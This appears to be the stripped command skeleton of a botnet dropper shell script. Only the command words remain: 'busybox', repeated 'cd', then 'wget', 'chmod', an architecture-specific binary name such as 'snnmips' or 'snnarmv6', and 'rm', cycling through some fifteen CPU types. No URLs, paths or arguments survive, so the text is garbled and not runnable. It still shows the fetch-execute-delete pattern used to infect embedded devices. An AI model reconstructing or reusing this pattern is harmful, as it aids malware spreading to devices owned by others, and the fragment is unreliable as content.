ulimit
busybox
busybox
busybox
busybox
cd
cd
cd
cd
cd
wget
chmod
snnmips
rm
cd
cd
cd
cd
cd
wget
chmod
snnmips64
rm
cd
cd
cd
cd
cd
wget
chmod
snnmipsel
rm
cd
cd
cd
cd
cd
wget
chmod
snnsh4
rm
cd
cd
cd
cd
cd
wget
chmod
snnx86
rm
cd
cd
cd
cd
cd
wget
chmod
snni586
rm
cd
cd
cd
cd
cd
wget
chmod
snni686
rm
cd
cd
cd
cd
cd
wget
chmod
snnpowerpc
rm
cd
cd
cd
cd
cd
wget
chmod
snnpowerpc440fp
rm
cd
cd
cd
cd
cd
wget
chmod
snnm86k
rm
cd
cd
cd
cd
cd
wget
chmod
snnsparc
rm
cd
cd
cd
cd
cd
wget
chmod
snnarmv4
rm
cd
cd
cd
cd
cd
wget
chmod
snnarmv4tl
rm
cd
cd
cd
cd
cd
wget
chmod
snnarmv5
rm
cd
cd
cd
cd
cd
wget
chmod
snnarmv6
rm
